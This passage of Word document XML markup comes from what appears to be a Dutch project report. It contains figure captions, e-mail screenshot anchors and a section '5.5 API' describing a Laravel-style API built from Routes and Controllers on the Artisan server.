          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253089792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="314A18B1" wp14:editId="1C47B908">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-20320</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>434340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5656580" cy="3342005"/>
            <wp:effectExtent l="25400" t="25400" r="33020" b="36195"/>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remium e-mail.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5656580" cy="334200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7AC1B8A7" w14:textId="0D27BC98" w:rsidR="008B11A9" w:rsidRDefault="00F03C4F" w:rsidP="00A83B83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253223936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FD52BFE" wp14:editId="647435A9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-24765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3559810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1333500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="821" name="Text Box 82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F304C" w14:textId="174645FB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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52BFE" id="Text Box 821" o:spid="_x0000_s1221" type="#_x0000_t202" style="position:absolute;margin-left:-1.95pt;margin-top:280.3pt;width:105pt;height:27pt;z-index:2532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EWz3k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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="052F304C" w14:textId="174645FB" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.15</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D52F81" w14:textId="77777777" w:rsidR="008B11A9" w:rsidRDefault="008B11A9">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B41B777" w14:textId="1ACE4F81" w:rsidR="00677E26" w:rsidRDefault="00F03C4F" w:rsidP="00EB3DC5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253224960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77CCBAE3" wp14:editId="535D30E5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>38735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3774440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="822" name="Text Box 82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3FB16" w14:textId="29314A18" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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BAE3" id="Text Box 822" o:spid="_x0000_s1222" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.05pt;margin-top:297.2pt;width:100pt;height:27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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0873FB16" w14:textId="29314A18" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.16</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00620F06">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253090816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="361ED3BA" wp14:editId="606234A4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>36830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3665855"/>
            <wp:effectExtent l="0" t="0" r="889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apport e-mail.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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00677E26" w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253092864" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="616FD4D4" wp14:editId="6E10760D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-916903</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="763" name="Rectangle 7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9ED6E" id="Rectangle 763" o:spid="_x0000_s1026" style="position:absolute;margin-left:-1in;margin-top:-72.15pt;width:25pt;height:1031.7pt;z-index:-2502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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6328298B" w14:textId="4A39258D" w:rsidR="00677E26" w:rsidRDefault="00677E26" w:rsidP="00A83B83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CEA71E" w14:textId="0B5B2FFB" w:rsidR="00677E26" w:rsidRDefault="00677E26" w:rsidP="00EB3DC5"/>
    <w:p w14:paraId="10EDF9C6" w14:textId="705B015A" w:rsidR="00677E26" w:rsidRDefault="00677E26" w:rsidP="00A83B83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A787A5" w14:textId="64CE1068" w:rsidR="00677E26" w:rsidRDefault="00677E26" w:rsidP="00677E26">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AE751C" w14:textId="77777777" w:rsidR="00677E26" w:rsidRDefault="00677E26" w:rsidP="00256686"/>
    <w:p w14:paraId="6C8BF649" w14:textId="77777777" w:rsidR="00C26333" w:rsidRDefault="002C64EE" w:rsidP="00256686">
      <w:pPr>
        <w:sectPr w:rsidR="00C26333" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId105"/>
          <w:headerReference w:type="first" r:id="rId106"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="402" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F087820" w14:textId="4111BC00" w:rsidR="00C26333" w:rsidRDefault="00AB5D38" w:rsidP="00256686">
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253095936" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0584C17B" wp14:editId="34DED615">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-915222</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-912644</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="815" name="Rectangle 8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BA251" id="Rectangle 815" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.05pt;margin-top:-71.8pt;width:25pt;height:1031.7pt;z-index:-2502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RFp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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D2428" w14:textId="12BA4CEB" w:rsidR="00C26333" w:rsidRDefault="00557C84" w:rsidP="008B186E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 </w:t>
      </w:r>
      <w:r w:rsidR="008B186E">
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EFEC8E" w14:textId="2361EF2A" w:rsidR="008B186E" w:rsidRDefault="00735EAA" w:rsidP="008B186E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253099008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53F976DC" wp14:editId="487B1AE5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>42545</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>251460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842000" cy="1024255"/>
                <wp:effectExtent l="0" t="0" r="25400" b="17145"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="818" name="Text Box 818"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5842000" cy="102425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92FF00C" w14:textId="3215D320" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="00170467" w:rsidRDefault="00E2204E">
                            <w:r w:rsidRPr="00170467">
                              <w:t xml:space="preserve">De API is opgebouwd uit Routes en Controllers en is operationeel op de Artisan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76DC" id="Text Box 818" o:spid="_x0000_s1223" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.35pt;margin-top:19.8pt;width:460pt;height:80.65pt;z-index:2530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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="792FF00C" w14:textId="3215D320" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="00170467" w:rsidRDefault="00E2204E">
                      <w:r w:rsidRPr="00170467">
                        <w:t xml:space="preserve">De API is opgebouwd uit Routes en Controllers en is operationeel op de Artisan server. </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF2184" w14:textId="0B09D5C3" w:rsidR="00AB5D38" w:rsidRDefault="00F03C4F" w:rsidP="008B186E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253225984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BAFDDDF" wp14:editId="2A124C66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>38735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4053205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1206500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="823" name="Text Box 82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7A2CB" w14:textId="4DC1840C" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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FDDDF" id="Text Box 823" o:spid="_x0000_s1224" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.05pt;margin-top:319.15pt;width:95pt;height:27pt;z-index:2532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6H3oCAABm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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6AE7A2CB" w14:textId="4DC1840C" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.17</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00787B87">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253101056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A1BE781" wp14:editId="6382A5E9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2384425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1317625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1203960" cy="457200"/>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12039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0B0B6" w14:textId="0C52BFC4" w:rsidR="00E2204E" w:rsidRPr="00090D9E" w:rsidRDefault="00E2204E">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BE781" id="Text Box 590" o:spid="_x0000_s1225" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:187.75pt;margin-top:103.75pt;width:94.8pt;height:36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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="27C0B0B6" w14:textId="0C52BFC4" w:rsidR="00E2204E" w:rsidRPr="00090D9E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BD1C12">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253106176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FA515E2" wp14:editId="32494764">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2002790</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3031490</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2095500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="633" name="Text Box 633"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2095500" cy="342900"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent5">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F0E416" w14:textId="32D126F1" w:rsidR="00E2204E" w:rsidRPr="00B86D2F" w:rsidRDefault="00E2204E" w:rsidP="00A803AF">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B86D2F">
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>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515E2" id="Text Box 633" o:spid="_x0000_s1226" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:157.7pt;margin-top:238.7pt;width:165pt;height:27pt;z-index:2531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" fillcolor="#bdd6ee [1304]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7DF0E416" w14:textId="32D126F1" w:rsidR="00E2204E" w:rsidRPr="00B86D2F" w:rsidRDefault="00E2204E" w:rsidP="00A803AF">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B86D2F">
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Functies</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DA4A17">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253104128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10292BC0" wp14:editId="7429E0D0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>673100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2000885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4690745" cy="1826895"/>
                <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="622" name="Text Box 622"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4690745" cy="1826895"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent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59023A" w14:textId="1DD31DDC" w:rsidR="00E2204E" w:rsidRPr="00EC73E2" w:rsidRDefault="00E2204E" w:rsidP="001B662D">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EC73E2">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                                <w:lang w:val="en-US"/>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2BC0" id="Text Box 622" o:spid="_x0000_s1227" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:53pt;margin-top:157.55pt;width:369.35pt;height:143.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" fillcolor="#ed7d31 [3205]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1D59023A" w14:textId="1DD31DDC" w:rsidR="00E2204E" w:rsidRPr="00EC73E2" w:rsidRDefault="00E2204E" w:rsidP="001B662D">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="32"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EC73E2">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="32"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Route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3105152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="074A7CF1" wp14:editId="155CB138">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>736600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2689225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4567555" cy="909955"/>
                <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="632" name="Text Box 632"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4567555" cy="909955"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent5"/>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C6C265" w14:textId="2E00DBD1" w:rsidR="00E2204E" w:rsidRPr="00EC73E2" w:rsidRDefault="00E2204E" w:rsidP="007376A4">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EC73E2">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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7CF1" id="Text Box 632" o:spid="_x0000_s1228" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:58pt;margin-top:211.75pt;width:359.65pt;height:71.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" fillcolor="#5b9bd5 [3208]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="77C6C265" w14:textId="2E00DBD1" w:rsidR="00E2204E" w:rsidRPr="00EC73E2" w:rsidRDefault="00E2204E" w:rsidP="007376A4">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="32"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EC73E2">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="32"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Controller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1669477" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20FE99A4" wp14:editId="1C9C8013">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>34925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1198880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5905500" cy="2858135"/>
                <wp:effectExtent l="0" t="0" r="38100" b="37465"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21691"/>
                    <wp:lineTo x="21646" y="21691"/>
                    <wp:lineTo x="21646" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="589" name="Rectangle 589"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5905500" cy="285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A2478" id="Rectangle 589" o:spid="_x0000_s1026" style="position:absolute;margin-left:2.75pt;margin-top:94.4pt;width:465pt;height:225.05pt;z-index:2516694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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0004584F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253102080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E796F11" wp14:editId="0B2E1479">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>610235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1885315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4762500" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="611" name="Text Box 611"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4762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BCF71" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E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96F11" id="Text Box 611" o:spid="_x0000_s1229" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:48.05pt;margin-top:148.45pt;width:375pt;height:45pt;z-index:2531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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="538BCF71" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4381A0C1" w14:textId="1EC1C75C" w:rsidR="009F1C46" w:rsidRDefault="009F1C46" w:rsidP="008B186E"/>
    <w:p w14:paraId="738EB91E" w14:textId="3181358A" w:rsidR="004C751F" w:rsidRDefault="004C751F" w:rsidP="008B186E"/>
    <w:p w14:paraId="771A4C8C" w14:textId="58DA053F" w:rsidR="00696758" w:rsidRDefault="00957BFC" w:rsidP="008B186E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
